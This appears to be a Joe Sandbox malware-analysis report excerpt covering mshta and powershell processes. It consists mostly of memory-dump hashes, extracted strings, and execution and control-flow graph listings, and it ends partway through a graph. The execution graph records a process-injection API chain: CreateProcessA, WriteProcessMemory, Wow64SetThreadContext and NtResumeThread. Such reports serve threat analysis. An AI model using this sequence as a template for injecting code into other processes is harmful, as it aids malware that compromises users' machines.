                                                                                                  Path:C:\Windows\System32\conhost.exe
                                                                                                  Wow64 process (32bit):false
                                                                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                  Imagebase:0x7ff7699e0000
                                                                                                  File size:862'208 bytes
                                                                                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                  Has elevated privileges:false
                                                                                                  Has administrator privileges:false
                                                                                                  Programmed in:C, C++ or other language
                                                                                                  Reputation:high
                                                                                                  Has exited:true

                                                                                                  Reset < >
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000003.1657841499.0000000007460000.00000010.00000800.00020000.00000000.sdmp, Offset: 07460000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_3_7460000_mshta.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID: '?Ykj&d==$0Ed;mJ\L1_DB$`xVy<2-b(HcqQp[)Kl(J)NjX8a3q*"W`LL!&}[a4kuB896#bb{IjM:ve8GW7pi'pq;JWaFYYG5nyRj39S*A'}9xTz.Hdl ]F9N/t>&l$$(J0k$(J0k$(J0k
                                                                                                    • API String ID: 0-2291587445
                                                                                                    • Opcode ID: ea4aeea201a3539a295b00fb61eed0db3e0716e359d1dc81bc787f5d56765f64
                                                                                                    • Instruction ID: ddf20f3fa609db7b01eb0117258691b837ddffe31b4bacfc20910c14ca255dcb
                                                                                                    • Opcode Fuzzy Hash: ea4aeea201a3539a295b00fb61eed0db3e0716e359d1dc81bc787f5d56765f64
                                                                                                    • Instruction Fuzzy Hash: 9081D1B5E10619DBDB14CFA8C445ADDF7B6BF89300F14460AE916B7390D7745881CB82
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000003.1657801074.0000000007461000.00000010.00000800.00020000.00000000.sdmp, Offset: 07461000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_3_7461000_mshta.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: f360bdd90608dbeb85f6d4f6b0dc15ecc873b34396327c2a5968c3f0dc2ab824
                                                                                                    • Instruction ID: 83af96d483d7ed169acfabbdd1a37b9ce599cf7a0419ea90a63694bbbb99a046
                                                                                                    • Opcode Fuzzy Hash: f360bdd90608dbeb85f6d4f6b0dc15ecc873b34396327c2a5968c3f0dc2ab824
                                                                                                    • Instruction Fuzzy Hash: 382129F0654349EAE71096AAD89EFF9B7DA5B89304F48041FEA5193341D6B81880D363
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000003.1657858727.0000000006EE0000.00000010.00000800.00020000.00000000.sdmp, Offset: 06EE0000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_3_6ee0000_mshta.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: cbebcb7641d6dd959061102dba4fb45bccaa93f69790a5bf6f5692b71942eee3
                                                                                                    • Instruction ID: aa7b8b8ce464a17f643b7ab5f1d8a169e791c58b319b5ef50e352a3094bbea0a
                                                                                                    • Opcode Fuzzy Hash: cbebcb7641d6dd959061102dba4fb45bccaa93f69790a5bf6f5692b71942eee3
                                                                                                    • Instruction Fuzzy Hash:
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000003.1657858727.0000000006EE0000.00000010.00000800.00020000.00000000.sdmp, Offset: 06EE0000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_3_6ee0000_mshta.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: cbebcb7641d6dd959061102dba4fb45bccaa93f69790a5bf6f5692b71942eee3
                                                                                                    • Instruction ID: aa7b8b8ce464a17f643b7ab5f1d8a169e791c58b319b5ef50e352a3094bbea0a
                                                                                                    • Opcode Fuzzy Hash: cbebcb7641d6dd959061102dba4fb45bccaa93f69790a5bf6f5692b71942eee3
                                                                                                    • Instruction Fuzzy Hash:
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000003.1657858727.0000000006EE0000.00000010.00000800.00020000.00000000.sdmp, Offset: 06EE0000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_3_6ee0000_mshta.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: cbebcb7641d6dd959061102dba4fb45bccaa93f69790a5bf6f5692b71942eee3
                                                                                                    • Instruction ID: aa7b8b8ce464a17f643b7ab5f1d8a169e791c58b319b5ef50e352a3094bbea0a
                                                                                                    • Opcode Fuzzy Hash: cbebcb7641d6dd959061102dba4fb45bccaa93f69790a5bf6f5692b71942eee3
                                                                                                    • Instruction Fuzzy Hash:
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000003.1657858727.0000000006EE0000.00000010.00000800.00020000.00000000.sdmp, Offset: 06EE0000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_3_6ee0000_mshta.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: cbebcb7641d6dd959061102dba4fb45bccaa93f69790a5bf6f5692b71942eee3
                                                                                                    • Instruction ID: aa7b8b8ce464a17f643b7ab5f1d8a169e791c58b319b5ef50e352a3094bbea0a
                                                                                                    • Opcode Fuzzy Hash: cbebcb7641d6dd959061102dba4fb45bccaa93f69790a5bf6f5692b71942eee3
                                                                                                    • Instruction Fuzzy Hash:
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000003.1657858727.0000000006EE0000.00000010.00000800.00020000.00000000.sdmp, Offset: 06EE0000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_3_6ee0000_mshta.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: cbebcb7641d6dd959061102dba4fb45bccaa93f69790a5bf6f5692b71942eee3
                                                                                                    • Instruction ID: aa7b8b8ce464a17f643b7ab5f1d8a169e791c58b319b5ef50e352a3094bbea0a
                                                                                                    • Opcode Fuzzy Hash: cbebcb7641d6dd959061102dba4fb45bccaa93f69790a5bf6f5692b71942eee3
                                                                                                    • Instruction Fuzzy Hash:
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000003.1657858727.0000000006EE0000.00000010.00000800.00020000.00000000.sdmp, Offset: 06EE0000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_3_6ee0000_mshta.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: cbebcb7641d6dd959061102dba4fb45bccaa93f69790a5bf6f5692b71942eee3
                                                                                                    • Instruction ID: aa7b8b8ce464a17f643b7ab5f1d8a169e791c58b319b5ef50e352a3094bbea0a
                                                                                                    • Opcode Fuzzy Hash: cbebcb7641d6dd959061102dba4fb45bccaa93f69790a5bf6f5692b71942eee3
                                                                                                    • Instruction Fuzzy Hash:
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000003.1657858727.0000000006EE0000.00000010.00000800.00020000.00000000.sdmp, Offset: 06EE0000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_3_6ee0000_mshta.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: cbebcb7641d6dd959061102dba4fb45bccaa93f69790a5bf6f5692b71942eee3
                                                                                                    • Instruction ID: aa7b8b8ce464a17f643b7ab5f1d8a169e791c58b319b5ef50e352a3094bbea0a
                                                                                                    • Opcode Fuzzy Hash: cbebcb7641d6dd959061102dba4fb45bccaa93f69790a5bf6f5692b71942eee3
                                                                                                    • Instruction Fuzzy Hash:
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000002.00000002.1869396173.0000000002A90000.00000040.00000800.00020000.00000000.sdmp, Offset: 02A90000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_2_2_2a90000_powershell.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID: (Xcq$LR^q
                                                                                                    • API String ID: 0-2856513941
                                                                                                    • Opcode ID: 4336865820ee5f23560daf5779499507cd99c4adfc58d8a03cf0397c6cd05bd7
                                                                                                    • Instruction ID: cb7be44afc9a3c10cde09e44575bfc34ef3910b672f530c4c68d1af3664d86c4
                                                                                                    • Opcode Fuzzy Hash: 4336865820ee5f23560daf5779499507cd99c4adfc58d8a03cf0397c6cd05bd7
                                                                                                    • Instruction Fuzzy Hash: 1C524A34B002188FDB24DB28C894B6EB7B6BF85704F1184A9D84A9B3A5DF34ED85CF51
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000002.00000002.1869396173.0000000002A90000.00000040.00000800.00020000.00000000.sdmp, Offset: 02A90000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_2_2_2a90000_powershell.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID: (Xcq$LR^q
                                                                                                    • API String ID: 0-2856513941
                                                                                                    • Opcode ID: e8b73fec638773f3d29f6f7baee53b18f9f6df5aa573199d5b5ab4d14c173bfc
                                                                                                    • Instruction ID: d876530554552fec44ad184b67a6c5ee3efc332c588c9f9bd585f785c02c5018
                                                                                                    • Opcode Fuzzy Hash: e8b73fec638773f3d29f6f7baee53b18f9f6df5aa573199d5b5ab4d14c173bfc
                                                                                                    • Instruction Fuzzy Hash: 67518B30B002288FDB24CF68C840B9EBBB6EF89700F1145A9E5059B3A4DB71AD85CF91
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000002.00000002.1869396173.0000000002A90000.00000040.00000800.00020000.00000000.sdmp, Offset: 02A90000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_2_2_2a90000_powershell.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: 4e49d53838e206495c84d0ce25b27e317454cd8075bbce0db7a7c3d61c124b7d
                                                                                                    • Instruction ID: 32e85d37f25338de526f99ddd0f8a2a5f977c236420df5a7da9fdd8ecefe4525
                                                                                                    • Opcode Fuzzy Hash: 4e49d53838e206495c84d0ce25b27e317454cd8075bbce0db7a7c3d61c124b7d
                                                                                                    • Instruction Fuzzy Hash: 0591AAB4A002499FCB15CF5AC494AAAFBF1FF48310B248599D915AB365CB35FC51CBA0
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000002.00000002.1869396173.0000000002A90000.00000040.00000800.00020000.00000000.sdmp, Offset: 02A90000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_2_2_2a90000_powershell.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: 131bd3c3fa8661eadcf2cf7365493bb3e5f17aa7bc7be9c6294f16662446d430
                                                                                                    • Instruction ID: b95397cef006cfcbffc827d5ce6c4a321c40268d55935af68c8326c8c8bddb2f
                                                                                                    • Opcode Fuzzy Hash: 131bd3c3fa8661eadcf2cf7365493bb3e5f17aa7bc7be9c6294f16662446d430
                                                                                                    • Instruction Fuzzy Hash: 2E4147B4A005099FCB05CF5AC5D8AAAFBF1FF48310B218199C955AB364CB36FC51CBA0
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000002.00000002.1869111113.0000000002A2D000.00000040.00000800.00020000.00000000.sdmp, Offset: 02A2D000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_2_2_2a2d000_powershell.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: 1612df8552a91424e6ac7d280ff1c026c9f4e1f114ea5ef69729570ec553aa44
                                                                                                    • Instruction ID: c8529eb8b619a0ea5a6123cc225df0da85c5239fa9e5824878753786034187fb
                                                                                                    • Opcode Fuzzy Hash: 1612df8552a91424e6ac7d280ff1c026c9f4e1f114ea5ef69729570ec553aa44
                                                                                                    • Instruction Fuzzy Hash: 90012B3100D7509AE7104B2ECDC4767BFA8DF41324F08C429EC4A4B157CB79D849C6B1
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000002.00000002.1869111113.0000000002A2D000.00000040.00000800.00020000.00000000.sdmp, Offset: 02A2D000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_2_2_2a2d000_powershell.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: 3080e07a34a9724cf5eb627e9e18be5921c20c8071ed9e76c68894a98abada80
                                                                                                    • Instruction ID: ae5dc0bf81078f92af4f0d592013e42bf04a9f554e20c63159705706b275ee5c
                                                                                                    • Opcode Fuzzy Hash: 3080e07a34a9724cf5eb627e9e18be5921c20c8071ed9e76c68894a98abada80
                                                                                                    • Instruction Fuzzy Hash: 9A015E6100E3C09ED7128B258894B52BFB4EF47224F1DC0CBD8888F1A7C3699849C772
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000002.00000002.1869396173.0000000002A90000.00000040.00000800.00020000.00000000.sdmp, Offset: 02A90000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_2_2_2a90000_powershell.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: 4ea958173de4e79a4aa314b6b27c4c58823cc539b95599ac55c196f5ec6a5c7a
                                                                                                    • Instruction ID: a67b9f3fbe884692f057a0c13eae4aa7c892cd9e57191b1742db47bd78939e26
                                                                                                    • Opcode Fuzzy Hash: 4ea958173de4e79a4aa314b6b27c4c58823cc539b95599ac55c196f5ec6a5c7a
                                                                                                    • Instruction Fuzzy Hash: B8F090B5D1C39A9FCF56DFB968121FDBFF09A06200B0440EBD448D7252EA340644CFA1
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000002.00000002.1869396173.0000000002A90000.00000040.00000800.00020000.00000000.sdmp, Offset: 02A90000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_2_2_2a90000_powershell.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: 92fcc65c027e2bc9e13d729f4b7e5272cb9b7a2e8f8e79de4801f50661299947
                                                                                                    • Instruction ID: ef222e57aaea8ed08217a0cbcdfc7c2920f53c67ccff8d651fe671df98ebe954
                                                                                                    • Opcode Fuzzy Hash: 92fcc65c027e2bc9e13d729f4b7e5272cb9b7a2e8f8e79de4801f50661299947
                                                                                                    • Instruction Fuzzy Hash: 1CD02EB101E3C9AECB8303B5381A3E8BFB08F02018F880083E0C4810A3AF2D12D8C2B1
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000002.00000002.1869396173.0000000002A90000.00000040.00000800.00020000.00000000.sdmp, Offset: 02A90000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_2_2_2a90000_powershell.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: f5f9c72dd536108b973cf29372f49e8acba6093baff925e8b9f3a92c5c1f1304
                                                                                                    • Instruction ID: d2309a6e56d6c13589422d9778f9368dcc209936a67cce5cd8539a278fe46471
                                                                                                    • Opcode Fuzzy Hash: f5f9c72dd536108b973cf29372f49e8acba6093baff925e8b9f3a92c5c1f1304
                                                                                                    • Instruction Fuzzy Hash: F4E026F5D1420E9F8F48DFB995421BEFFF5AB48200F1085AE9919E3340EA3456518FA5

                                                                                                    Execution Graph

                                                                                                    Execution Coverage:3%
                                                                                                    Dynamic/Decrypted Code Coverage:0%
                                                                                                    Signature Coverage:10.3%
                                                                                                    Total number of Nodes:29
                                                                                                    Total number of Limit Nodes:0
                                                                                                    execution_graph 66335 767eeb4 66336 767eec5 66335->66336 66339 767f6ba 66336->66339 66340 767f6c9 66339->66340 66344 767fb58 66340->66344 66348 767fb60 66340->66348 66341 767eedb 66345 767fba8 WriteProcessMemory 66344->66345 66347 767fbff 66345->66347 66347->66341 66349 767fba8 WriteProcessMemory 66348->66349 66351 767fbff 66349->66351 66351->66341 66369 76c0bd8 66370 76c0c20 NtResumeThread 66369->66370 66372 76c0c55 66370->66372 66373 767ead0 66374 767eb34 CreateProcessA 66373->66374 66376 767ecbc 66374->66376 66352 4e26b48 66353 4e26b60 66352->66353 66354 4e26c6b 66353->66354 66357 7613bc1 66353->66357 66361 7613bc8 66353->66361 66358 7613c13 WriteProcessMemory 66357->66358 66360 7613c64 66358->66360 66360->66354 66362 7613c13 WriteProcessMemory 66361->66362 66364 7613c64 66362->66364 66364->66354 66365 76c0040 66366 76c0085 Wow64SetThreadContext 66365->66366 66368 76c00cd 66366->66368
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000005.00000002.2631935897.0000000007650000.00000040.00000800.00020000.00000000.sdmp, Offset: 07650000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_5_2_7650000_powershell.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID: ,bq$4$$^q$$^q$$^q$$^q$$^q$$^q$$^q$$^q$$^q$$^q
                                                                                                    • API String ID: 0-312445597
                                                                                                    • Opcode ID: cfa40752c6b4363d29fcae3c16ae3c74092b842f1478f8ed203236a2820b8bbe
                                                                                                    • Instruction ID: ee96a3e5fde2626342edb4651390a23733ad6a84c0e422fc29e29a4a739c431b
                                                                                                    • Opcode Fuzzy Hash: cfa40752c6b4363d29fcae3c16ae3c74092b842f1478f8ed203236a2820b8bbe
                                                                                                    • Instruction Fuzzy Hash: 4DB22AB4A002598FDB14CFA5C894FADBBB6BF88700F144199E906AB3A5CB70DC85DF50
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000005.00000002.2631935897.0000000007650000.00000040.00000800.00020000.00000000.sdmp, Offset: 07650000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_5_2_7650000_powershell.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID: ,bq$4$$^q$$^q$$^q$$^q
                                                                                                    • API String ID: 0-2546334966
                                                                                                    • Opcode ID: 167551d8a6442d6652c8bdb3758ea3963c298d7e601b923b1bcdf458eefefd4a
                                                                                                    • Instruction ID: 0e7cb1c4354159064cae7051c37041a364a48c4045e999fa559e66b80c0ccb8b
                                                                                                    • Opcode Fuzzy Hash: 167551d8a6442d6652c8bdb3758ea3963c298d7e601b923b1bcdf458eefefd4a
                                                                                                    • Instruction Fuzzy Hash: 8B220AB4A00259CFDB24CF65C984BADBBB2BF48300F1481D9D90AAB3A5DB719D85DF50

                                                                                                    Control-flow Graph

                                                                                                    • Executed
                                                                                                    • Not Executed
                                                                                                    control_flow_graph 1587 7655618-765562f 1588 7655635-7655644 1587->1588 1589 76559bc-76559e1 1587->1589 1592 7655646-7655648 1588->1592 1593 765564d-7655666 1588->1593 1604 76559e8-76559f0 1589->1604 1594 76559b4-76559bb 1592->1594 1597 765568f-7655691 1593->1597 1598 7655668-765566f 1593->1598 1597->1594 1600 7655696-76556f2 call 7653a48 1598->1600 1601 7655671-7655678 1598->1601 1623 76557cc-76557d3 1600->1623 1624 76556f8-76556fe 1600->1624 1603 765567e-765568d 1601->1603 1601->1604 1603->1597 1603->1600 1608 76559f2-7655a0c 1604->1608 1609 7655a6a-7655a6d 1604->1609 1611 7655acf-7655aec 1609->1611 1612 7655a6f-7655a73 1609->1612 1615 7655afd 1611->1615 1616 7655aee-7655afb 1611->1616 1617 7655b02-7655b04 1615->1617 1616->1617 1619 7655b06-7655b0d 1617->1619 1620 7655b10 1617->1620 1622 7655b18-7655b1a 1620->1622 1625 7655b23-7655b3b 1622->1625 1626 7655b1c 1622->1626 1628 76557d5-76557d7 1623->1628 1629 76557dc-76557f5 1623->1629 1624->1604 1627 7655704-765571c 1624->1627 1632 7655b42-7655b46 1625->1632 1633 7655b3d-7655b40 1625->1633 1630 7655b97-7655b9c 1626->1630 1639 7655777-7655788 1627->1639 1640 765571e-765572a 1627->1640 1628->1594 1637 76557f7-7655803 1629->1637 1638 765580a-7655846 1629->1638 1636 7655b4d-7655b61 1632->1636 1633->1636 1649 7655b63-7655b68 1636->1649 1650 7655b6b-7655b6f 1636->1650 1637->1638 1671 76559a7-76559ab 1638->1671 1672 765584c 1638->1672 1647 76557bf-76557c6 1639->1647 1648 765578a-765578e 1639->1648 1645 7655733-7655737 1640->1645 1646 765572c-765572e 1640->1646 1651 765575e-7655775 call 7653e70 1645->1651 1652 7655739-7655745 1645->1652 1646->1594 1647->1623 1647->1624 1653 7655790-765579f 1648->1653 1654 76557a8-76557bc call 7653e70 1648->1654 1649->1650 1656 7655b75-7655b7c 1650->1656 1657 7655b71-7655b73 1650->1657 1651->1647 1652->1651 1669 7655747-7655755 1652->1669 1653->1654 1670 76557a1-76557a3 1653->1670 1654->1647 1661 7655b82-7655b84 1656->1661 1657->1661 1662 7655b86 1661->1662 1663 7655b8d-7655b94 1661->1663 1662->1630 1669->1651 1679 7655757-7655759 1669->1679 1670->1594 1673 76559b1 1671->1673 1674 76559ad-76559af 1671->1674 1676 765584f-765586d 1672->1676 1673->1594 1674->1594 1681 7655995-76559a1 1676->1681 1682 7655873-765587c 1676->1682 1679->1594 1681->1671 1681->1676 1683 7655895-76558a1 1682->1683 1684 765587e 1682->1684 1686 76558a7-76558ad 1683->1686 1687 7655941-765594c 1683->1687 1685 7655881-7655893 1684->1685 1685->1683 1685->1685 1688 76558b3-76558bc 1686->1688 1689 765592f-765593b 1686->1689 1690 7655981-7655983 1687->1690 1691 765594e 1687->1691 1688->1604 1693 76558c2-76558d3 1688->1693 1689->1686 1689->1687 1690->1681 1692 7655985-7655992 1690->1692 1694 7655951-765595a 1691->1694 1692->1681 1693->1604 1699 76558d9-76558f2 1693->1699 1695 7655963-765596b 1694->1695 1696 765595c-7655961 1694->1696 1695->1604 1698 765596d-765597f 1695->1698 1696->1690 1698->1690 1698->1694 1703 76558f4-7655914 1699->1703 1704 7655929-765592d 1699->1704 1703->1704 1707 7655916-765591f 1703->1707 1704->1688 1704->1689 1707->1604 1708 7655925 1707->1708 1708->1704
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000005.00000002.2631935897.0000000007650000.00000040.00000800.00020000.00000000.sdmp, Offset: 07650000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_5_2_7650000_powershell.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID: (bq$,bq
                                                                                                    • API String ID: 0-1616511919
                                                                                                    • Opcode ID: 308a36545396fad413ba4490ef8377484e3e39b36db3488b2ac5fd8b568ef210
                                                                                                    • Instruction ID: 36ca08e08349521ecd210a560a523199a741b5e95df2138a0e72a4cf68416dee
                                                                                                    • Opcode Fuzzy Hash: 308a36545396fad413ba4490ef8377484e3e39b36db3488b2ac5fd8b568ef210
                                                                                                    • Instruction Fuzzy Hash: 40F12BB4A00245CFDB14DF69C588AAEB7F6BF88310F1580A9D8079B362D734ED51DB91

                                                                                                    Control-flow Graph

                                                                                                    • Executed
                                                                                                    • Not Executed
                                                                                                    control_flow_graph 1811 7687683-768772b 1818 7687731-76877f4 1811->1818 1819 7687803-768784b 1811->1819 1818->1819 1849 76877f6-7687800 1818->1849 1824 76879ec-7687aa0 1819->1824 1825 7687851-7687893 1819->1825 1854 7687b5f-7687b99 1824->1854 1855 7687aa6-7687b5d 1824->1855 1833 76879d1-76879e0 1825->1833 1835 76878b0-76878bf 1833->1835 1836 76879e6-76879e7 1833->1836 1838 76878c1 1835->1838 1839 76878c6-7687938 1835->1839 1840 7687d6f-7687dc4 1836->1840 1838->1839 1851 768793a 1839->1851 1852 768793f-76879c6 1839->1852 1856 768805d-768808b 1840->1856 1849->1819 1851->1852 1899 76879c8 1852->1899 1900 76879cb 1852->1900 1869 7687ba0-7687ba9 1854->1869 1855->1869 1862 7687dc9-7687e0a 1856->1862 1863 7688091-76880b2 1856->1863 1872 7687e0c 1862->1872 1873 7687e13-7687e14 1862->1873 1935 76880b8 call 768b9a8 1863->1935 1936 76880b8 call 768b999 1863->1936 1874 7687d5a-7687d69 1869->1874 1872->1873 1877 7687e19-7687e2b 1872->1877 1878 7687faa-7687fef 1872->1878 1879 7687e3e-7687e8e 1872->1879 1880 7687f60-7687fa5 1872->1880 1881 7687ff1-7688003 1872->1881 1882 7687e93-7687ef1 1872->1882 1883 7688013-768804c 1872->1883 1884 7687ef6-7687f5b 1872->1884 1885 7688057 1873->1885 1874->1840 1886 7687bae-7687bbd 1874->1886 1876 76880be-7688100 1888 7687e2d 1877->1888 1889 7687e32-7687e39 1877->1889 1878->1885 1879->1885 1880->1885 1890 768800a-7688011 1881->1890 1891 7688005 1881->1891 1882->1885 1883->1885 1884->1885 1885->1856 1893 7687bbf 1886->1893 1894 7687bc4-7687c45 1886->1894 1888->1889 1889->1885 1890->1885 1891->1890 1893->1894 1923 7687c4b-7687c76 1894->1923 1924 7687cd4-7687cff 1894->1924 1899->1900 1900->1833 1925 7687c78 1923->1925 1926 7687c7d-7687ccf 1923->1926 1927 7687d01 1924->1927 1928 7687d06-7687d49 1924->1928 1925->1926 1934 7687d54 1926->1934 1927->1928 1928->1934 1934->1874 1935->1876 1936->1876
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000005.00000002.2632294203.0000000007680000.00000040.00000800.00020000.00000000.sdmp, Offset: 07680000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_5_2_7680000_powershell.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID: $G%G%
                                                                                                    • API String ID: 0-1447685239
                                                                                                    • Opcode ID: c2783ec4aac7dec9123e9a8672e4803f2581b577fe4b2bd819768c605806a159
                                                                                                    • Instruction ID: dfd87c25634733ee908564c87e3f2eab008924cae0553c0d88f9ac7ab6df6878
                                                                                                    • Opcode Fuzzy Hash: c2783ec4aac7dec9123e9a8672e4803f2581b577fe4b2bd819768c605806a159
                                                                                                    • Instruction Fuzzy Hash: 0052A6B8A006298FCB64DF28D984B9ABBF6FB89301F1081D5D50DA7365DB309E85CF54

                                                                                                    Control-flow Graph

                                                                                                    • Executed
                                                                                                    • Not Executed
                                                                                                    control_flow_graph 2030 7650006-765006b 2032 7650072-76500bf 2030->2032 2033 765006d 2030->2033 2036 76500c2-76500c8 2032->2036 2033->2032 2037 76500d1-76500d2 2036->2037 2038 76500ca 2036->2038 2039 76500d4-76500e0 2037->2039 2038->2037 2038->2039 2040 7650176-7650245 2038->2040 2041 7650256-76502be 2038->2041 2042 76500e1-76500f1 2038->2042 2043 7650132-7650162 2038->2043 2044 7650322-765038c 2038->2044 2045 765039f-76503e4 2038->2045 2046 76502cf-765030f 2038->2046 2064 7650164-765016a 2040->2064 2127 765024b-7650251 2040->2127 2041->2064 2077 76502c4-76502ca 2041->2077 2060 76500fd-7650128 2042->2060 2043->2064 2044->2064 2076 7650392-765039a 2044->2076 2061 76503e6-76503ec 2045->2061 2062 76503ee-76503f3 2045->2062 2063 7650315-765031d 2046->2063 2046->2064 2060->2036 2065 765012a-7650130 2060->2065 2061->2062 2066 76503f5-76503f6 2062->2066 2067 76503f8-7650443 2062->2067 2063->2064 2068 7650173-7650174 2064->2068 2069 765016c 2064->2069 2065->2036 2066->2067 2111 7650445-765044b 2067->2111 2112 765044d-7650452 2067->2112 2068->2040 2069->2040 2069->2041 2069->2044 2069->2045 2069->2046 2069->2068 2073 76504b3-76504fa 2069->2073 2074 76504fc-765051f 2069->2074 2075 765052e-765054b 2069->2075 2080 76504a1-76504a7 2073->2080 2074->2080 2081 7650521-7650529 2074->2081 2086 7650581-76505a9 2075->2086 2087 765054d-7650563 2075->2087 2076->2064 2077->2064 2083 76504b0-76504b1 2080->2083 2084 76504a9 2080->2084 2081->2080 2083->2073 2084->2073 2084->2074 2084->2075 2084->2083 2084->2086 2089 7650625-7650658 2084->2089 2090 7650667 2084->2090 2091 76507c1 2084->2091 2092 7650780-76507b1 2084->2092 2093 7650622-7650623 2084->2093 2094 7650714 2084->2094 2095 76505b6 2084->2095 2096 7650711-7650712 2084->2096 2097 76505b3-76505b4 2084->2097 2098 76506d3-7650704 2084->2098 2099 76507be-76507bf 2084->2099 2102 765056f-7650575 2086->2102 2118 76505ab-76505b1 2086->2118 2101 7650565-765056d 2087->2101 2087->2102 